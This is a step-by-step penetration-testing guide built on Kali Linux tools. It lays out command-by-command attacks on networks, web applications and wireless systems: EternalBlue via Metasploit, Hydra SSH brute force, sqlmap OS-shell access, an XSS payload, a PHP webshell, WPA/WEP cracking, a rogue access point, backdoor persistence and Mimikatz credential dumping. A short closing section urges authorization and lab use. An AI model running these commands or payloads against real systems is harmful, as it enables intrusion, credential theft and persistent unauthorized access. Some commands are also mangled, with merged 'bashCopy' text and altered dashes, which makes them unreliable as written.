Here’s a step-by-step guide to identify and exploit vulnerabilities in networks, web applications, and wireless systems , using Kali Linux and industry-standard tools:
1. Network Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- Nmap : Scan for open ports and services.bashCopy1nmap -sV -T4 -p- 192.168.1.100 # Full scan with service detection
- Nessus/OpenVAS : Identify CVE-based vulnerabilities.bashCopy1sudo openvas-start # Start OpenVAS services
- Nmap NSE Scripts :bashCopy1nmap –script=vuln 192.168.1.100 # Run vulnerability scripts
- Common Vulnerabilities :
- Unpatched services (e.g., SMB, Apache, SSH).
- Misconfigured firewalls.
- Default credentials (e.g., admin:admin).
B. Exploit Vulnerabilities
- Metasploit Framework :bashCopy12345msfconsolesearch exploit/windows/smb/ms17_010_eternalblue # EternalBlue exploit (CVE-2017-0144)use exploit/windows/smb/ms17_010_eternalblueset RHOSTS 192.168.1.100exploit
- Common Exploits :
- Unpatched SMB : EternalBlue (Windows).
- SSH Misconfigurations : Brute-force attacks with Hydra .bashCopy1hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh
- Weak Passwords : Use John the Ripper or Hashcat to crack hashes.
2. Web Application Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- OWASP ZAP : Automated web app scanning.
- sqlmap : Detect SQL injection.bashCopy1sqlmap -u “http://target.com/login.php?user=admin” –dbs
- DirBuster : Enumerate directories and files.
- Burp Suite : Intercept and manipulate HTTP requests.
- Common Vulnerabilities :
- SQL Injection (SQLi).
- Cross-Site Scripting (XSS) .
- Insecure File Uploads .
- Broken Authentication .
B. Exploit Vulnerabilities
- SQL Injection :
- sqlmap -u “http://target.com/login.php?user=admin” –os-shell # Get an OS shell
- XSS : Inject malicious JavaScript in a vulnerable input field:html
- <script>alert(‘XSS’)</script>
- File Upload Exploits : Upload a PHP webshell (e.g.,
webshell.php):- <?php system($_GET[‘cmd’]); ?>
- Access via
http://target.com/upload/webshell.php?cmd=id.
- Broken Authentication : Use Burp Suite to intercept and replay authentication tokens.
3. Wireless Network Vulnerability Identification & Exploitation
A. Identify Vulnerabilities
- Tools :
- Aircrack-ng : Crack WPA/WPA2 passwords.
- Wireshark : Analyze wireless traffic.
- Common Vulnerabilities :
- Weak WPA/WPA2 passwords.
- WEP encryption (easily cracked).
- Rogue access points.
- Weak SSIDs or default credentials.
B. Exploit Vulnerabilities
- WPA/WPA2 Cracking :
- Capture handshake:
- airodump-ng wlan0mon -c 6 –bssid [BSSID] -w handshakes
- Crack with a wordlist:
- aircrack-ng -w /usr/share/wordlists/rockyou.txt handshakes-01.cap
- Capture handshake:
- WEP Cracking :
- airodump-ng –bssid [BSSID] -c 6 –essid [SSID] -w wep_handshake wlan0mon
- aireplay-ng -1 0 -a [BSSID] wlan0mon # Deauthenticate clients
- aircrack-ng -b [BSSID] wep_handshake*.cap
- Rogue AP Attack : Create a fake AP with Hostapd and Dnsmasq to capture credentials.
4. Post-Exploitation & Privilege Escalation
A. Maintain Access
- Meterpreter :
- meterpreter > sysinfo # Get system info
- meterpreter > shell # Get a shell
- Backdoors : Add a user or modify system files to ensure persistent access.
B. Privilege Escalation
- Linux :
- Use LinEnum /LinPEAS to find misconfigurations.
- ./LinEnum.sh -u
- Exploit SUID binaries or misconfigured services (e.g.,
sudorules).
- Use LinEnum /LinPEAS to find misconfigurations.
- Windows :
- Use Mimikatz to dump credentials.
- mimikatz.exe “privilege::debug””sekurlsa::logonpasswords”exit
- Exploit misconfigured services (e.g., Serv-U FTP ).
- Use Mimikatz to dump credentials.
5. Quick Reference Table
| Target | Tool | Command/Usage |
|---|---|---|
| Network | Nmap | nmap -sV -T4 -p- 192.168.1.100 |
| Web | sqlmap | sqlmap -u "http://target.com/login.php" --dbs |
| Wireless | Aircrack-ng | aircrack-ng -w wordlist.txt handshakes.cap |
| Exploitation | Metasploit | msfconsole; use exploit/windows/smb/ms17_010_eternalblue |
6. Best Practices
- Authorization : Always obtain written permission.
- Minimize Impact : Avoid DoS attacks or data corruption.
- Document Everything : Log commands, findings, and screenshots.
- Use VMs : Test in a controlled environment (e.g., Metasploitable VM).
- Stay Updated : Follow CVE databases (e.g., CVE Details ).
Example Workflow
- Network :
- Scan with Nmap to find an unpatched SMB service.
- Exploit with Metasploit’s EternalBlue .
- Use Meterpreter to escalate privileges.
- Web :
- Use sqlmap to find a SQLi vulnerability in a login form.
- Dump the database and extract credentials.
- Wireless :
- Capture a WPA handshake with Aircrack-ng .
- Crack it with a wordlist to gain network access.
Resources for Mastery
- Practice Platforms :
- Hack The Box (Real-world scenarios).
- TryHackMe (Guided labs).
- Certifications :
- OSCP (Offensive Security Certified Professional) .
- CEH (Certified Ethical Hacker) .
Final Tips
- Automate : Script repetitive tasks (e.g., Nmap scans with
nmap -oX report.xml). - Join Communities : Engage with forums like Offensive Security or Reddit’s r/penetrationtesting .
By following these steps and using Kali Linux’s tools, you can systematically identify and exploit vulnerabilities in networks, web apps, and wireless systems while adhering to ethical standards. 🔍💻
